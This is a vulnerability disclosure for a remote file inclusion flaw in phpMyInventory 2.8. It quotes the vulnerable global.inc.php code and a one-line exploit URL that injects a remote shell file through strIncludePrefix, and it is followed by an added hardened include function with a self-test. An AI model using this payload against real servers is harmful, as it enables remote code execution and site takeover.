
phpMyInventory 2.8 (global.inc.php) RFI Vuln

########################################################################################
phpMyInventory (pmi)
v. 2.8
FOUND BY : o0xxdark0o
o0xxdark0o[at]msn.com
DOWNLOAD : http://sourceforge.net/projects/phpmyinventory/
REMOTE FILE INCLUDE
########################################################################################
FILE :
PATH\Includes\global.inc.php
########################################################################################
EXPLOIT:
www.xxx.com/pmi_v28/Includes/global.inc.php?strIncludePrefix=Shell.txt?
########################################################################################
CODE:
<?
// where rare administrative emails will go
$adminEmail = "youraddress@yourdomain.com";

$secureAdmin = 0; # set to 1 if SSL is available
$sslPort = 443; # what port, if using SSL?

$rowLimit = 12; # how many records any given page should show at one time

# -------------------------------------------------------------------- #

session_register("userID");
session_register("sessionTime");
session_register("sessionSecurity");

// by creating a separate set of includes for different domain names,
// you can serve multiple PMI's from one codebase.
//
// if ($SERVER_NAME = "dev.3gwt.net") {
// $includeFolder = "Includes/3gwt";
// } else if ($SERVER_NAME = "www.foozball.com") {
// $includeFolder = "Includes/foozball";
// } else {
$includeFolder = "Includes";
// }

$strIncludePrefix = $strIncludePrefix.$includeFolder;
Include($strIncludePrefix."/db.inc.php");
-----there is more of the code; download v. 2.8 to see it-----
########################################################################################
BY : o0xxdark0o
o0xxdark0o@msn.com
########################################################################################
thanks to all my friends.. str0ke ... oxdo .... cold z3ro...keenest
www.hach-teach.org - www.3asfh.com - www.goldenawy.com - www.yee7.com
########################################################################################
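
A hardened form of the include at the end of the quoted excerpt, as an added example that is not part of the original post or of phpMyInventory: the excerpt concatenates `$strIncludePrefix` without ever initialising it, so the path here is built from the file system and checked for containment instead. The helper name `pmi_resolve_include()`, the allowlist and the directory layout are assumptions.

```php
<?php
// Added example, not phpMyInventory code. pmi_resolve_include() is a
// hypothetical helper; the allowlist and directory layout are assumptions.

function pmi_resolve_include($appRoot, $includeFolder, $file)
{
    // The include set is chosen from a fixed allowlist, which keeps the
    // "several domains, one codebase" idea from the original comments.
    $allowedFolders = array('Includes');
    if (!in_array($includeFolder, $allowedFolders, true)) {
        return false;
    }
    $base = realpath($appRoot);
    if ($base === false) {
        return false;
    }
    // realpath() returns false for URLs and for paths that do not exist.
    $path = realpath($base . '/' . $includeFolder . '/' . $file);
    // The trailing separator stops "<root>_other" from matching "<root>".
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

// Intended use at the end of global.inc.php, which lives in <root>/Includes:
//   $dbInc = pmi_resolve_include(dirname(dirname(__FILE__)), 'Includes', 'db.inc.php');
//   if ($dbInc === false) { exit('Configuration error'); }
//   require $dbInc;

// Constructed self-check: a throwaway tree plus one file outside it.
$root = sys_get_temp_dir() . '/pmi_demo_' . getmypid();
mkdir($root . '/Includes', 0700, true);
file_put_contents($root . '/Includes/db.inc.php', "<?php\n");
file_put_contents($root . '_outside.txt', "constructed\n");

$cases = array(
    'local db.inc.php'      => array('Includes', 'db.inc.php'),
    'URL as include folder' => array('http://example.invalid/x?', 'db.inc.php'),
    'traversal out of root' => array('Includes', '../../' . basename($root) . '_outside.txt'),
);
foreach ($cases as $label => $args) {
    $result = pmi_resolve_include($root, $args[0], $args[1]);
    echo $label, ': ', ($result === false ? 'rejected' : 'accepted'), "\n";
}
unlink($root . '/Includes/db.inc.php'); unlink($root . '_outside.txt');
rmdir($root . '/Includes'); rmdir($root);
```

Run with the PHP CLI; only the first case resolves to a path, and the traversal case shows why the comparison includes the trailing directory separator.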
